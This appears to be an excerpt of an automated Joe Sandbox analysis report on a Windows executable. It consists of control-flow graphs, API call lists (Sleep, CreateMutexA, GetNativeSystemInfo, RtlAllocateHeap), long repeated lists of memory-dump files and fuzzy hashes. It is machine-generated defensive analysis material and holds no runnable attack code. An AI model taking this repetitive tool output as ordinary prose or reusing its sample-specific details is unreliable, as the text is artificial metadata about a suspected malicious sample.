                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 452119c921a50a4967446a145f859c2e8fa51e2c2ca12794e3c7599ec330ccc1
                                                                                                                                                                                                                                                                • Instruction ID: 9b6fd95ed2802c5fe7b40f1706245e95050296e9c9d923aee5835734f74eef89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 452119c921a50a4967446a145f859c2e8fa51e2c2ca12794e3c7599ec330ccc1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA216A31245285AAFB26A7AB9C9777DB2569FC1300F244816F504D62F2CA7AADC18263

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 477 9ea34f-9ea35b 478 9ea35d-9ea36b 477->478 479 9ea371-9ea39a call 9fd663 477->479 478->479 480 9ea93a 478->480 485 9ea39c-9ea3a8 479->485 486 9ea3c8-9ea916 call 9f80c0 479->486 482 9ea953-9ea994 Sleep CreateMutexA 480->482 483 9ea93a call a16c6a 480->483 493 9ea996-9ea998 482->493 494 9ea9a7-9ea9a8 482->494 483->482 489 9ea3be-9ea3c5 call 9fd663 485->489 490 9ea3aa-9ea3b8 485->490 489->486 490->480 490->489 493->494 497 9ea99a-9ea9a5 493->497 497->494
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 334618de71d48fc7b220ad6ff6b272c76dc5af9940d03d24c6c5ef79d175b560
                                                                                                                                                                                                                                                                • Instruction ID: 1045aa7d77c171158b4fae544159d6a5901d5559f675519e092ffe22181d80ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 334618de71d48fc7b220ad6ff6b272c76dc5af9940d03d24c6c5ef79d175b560
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 952179323002449BEB09DB69DC8576CB766EBD2314F244219E404DB6F6CB766E808752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 536 9e7d30-9e7db2 call a140f0 540 9e7db8-9e7de0 call 9f7a00 call 9e5c10 536->540 541 9e8356-9e8373 call 9fcff1 536->541 548 9e7de4-9e7e06 call 9f7a00 call 9e5c10 540->548 549 9e7de2 540->549 554 9e7e0a-9e7e23 548->554 555 9e7e08 548->555 549->548 558 9e7e54-9e7e7f 554->558 559 9e7e25-9e7e34 554->559 555->554 560 9e7eb0-9e7ed1 558->560 561 9e7e81-9e7e90 558->561 562 9e7e4a-9e7e51 call 9fd663 559->562 563 9e7e36-9e7e44 559->563 567 9e7ed7-9e7edc 560->567 568 9e7ed3-9e7ed5 GetNativeSystemInfo 560->568 565 9e7ea6-9e7ead call 9fd663 561->565 566 9e7e92-9e7ea0 561->566 562->558 563->562 569 9e8374 call a16c6a 563->569 565->560 566->565 566->569 573 9e7edd-9e7ee6 567->573 568->573 574 9e8379-9e837f call a16c6a 569->574 577 9e7ee8-9e7eef 573->577 578 9e7f04-9e7f07 573->578 582 9e7ef5-9e7eff 577->582 583 9e8351 577->583 579 9e7f0d-9e7f16 578->579 580 9e82f7-9e82fa 578->580 585 9e7f18-9e7f24 579->585 586 9e7f29-9e7f2c 579->586 580->583 587 9e82fc-9e8305 580->587 584 9e834c 582->584 583->541 584->583 585->584 589 9e82d4-9e82d6 586->589 590 9e7f32-9e7f39 586->590 591 9e832c-9e832f 587->591 592 9e8307-9e830b 587->592 599 9e82d8-9e82e2 589->599 600 9e82e4-9e82e7 589->600 593 9e7f3f-9e7f9b call 9f7a00 call 9e5c10 call 9f7a00 call 9e5c10 call 9e5d50 590->593 594 9e8019-9e82bd call 9f7a00 call 9e5c10 call 9f7a00 call 9e5c10 call 9e5d50 call 9f7a00 call 9e5c10 call 9e5730 call 9f7a00 call 9e5c10 call 9f7a00 call 9e5c10 call 9e5d50 call 9f7a00 call 9e5c10 call 9e5730 call 9f7a00 call 9e5c10 call 9f7a00 call 9e5c10 call 9e5d50 call 9f7a00 call 9e5c10 call 9e5730 call 9f7a00 call 9e5c10 call 9f7a00 call 9e5c10 call 9e5d50 call 9f7a00 call 9e5c10 call 9e5730 590->594 597 9e833d-9e8349 591->597 598 9e8331-9e833b 591->598 595 9e830d-9e8312 592->595 596 9e8320-9e832a 592->596 622 9e7fa0-9e7fa7 593->622 636 9e82c3-9e82cc 594->636 595->596 603 9e8314-9e831e 595->603 596->583 597->584 598->583 599->584 600->583 601 9e82e9-9e82f5 600->601 601->584 603->583 623 9e7fab-9e7fcb call a18bbe 622->623 624 9e7fa9 622->624 630 9e7fcd-9e7fdc 623->630 631 9e8002-9e8004 623->631 624->623 633 9e7fde-9e7fec 630->633 634 9e7ff2-9e7fff call 9fd663 630->634 635 9e800a-9e8014 631->635 631->636 633->574 633->634 634->631 635->636 636->580 640 9e82ce 636->640 640->589
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009E7ED3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                                                • Opcode ID: aa23118f75d747448b4cff2e98fa07e3a84df91edd0642e83e9bfa7bcf2edc0b
                                                                                                                                                                                                                                                                • Instruction ID: e817f40d4df975209c5a19c508a4f15bb6d9fe791c5784045ee91808cc99ce87
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa23118f75d747448b4cff2e98fa07e3a84df91edd0642e83e9bfa7bcf2edc0b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0E11A75E00284A7DF16FBA9CD173AE7771AB81714F94068CE419673C2DB358E8187C2

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 835 a1d82f-a1d83a 836 a1d848-a1d84e 835->836 837 a1d83c-a1d846 835->837 838 a1d850-a1d851 836->838 839 a1d867-a1d878 RtlAllocateHeap 836->839 837->836 840 a1d87c-a1d887 call a175f6 837->840 838->839 841 a1d853-a1d85a call a19dc0 839->841 842 a1d87a 839->842 845 a1d889-a1d88b 840->845 841->840 848 a1d85c-a1d865 call a18e36 841->848 842->845 848->839 848->840
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A1A813,00000001,00000364,00000006,000000FF,?,00A1EE3F,?,00000004,00000000,?,?), ref: 00A1D871
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 89d225184e58b1123352aa9a1ef7a5c31f2dcf71398390eafa2d71b4e523ae6d
                                                                                                                                                                                                                                                                • Instruction ID: 66ad8ef7110d3003a8e7824e4192d03703024e6074d870b63f0597e81f03ddd4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89d225184e58b1123352aa9a1ef7a5c31f2dcf71398390eafa2d71b4e523ae6d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF0A73260522566EF217B769D01BDB7B69DF867B0F198521ED08AB181EB30DCC186E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,009EDA1D,?,?,?,?), ref: 009E87B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
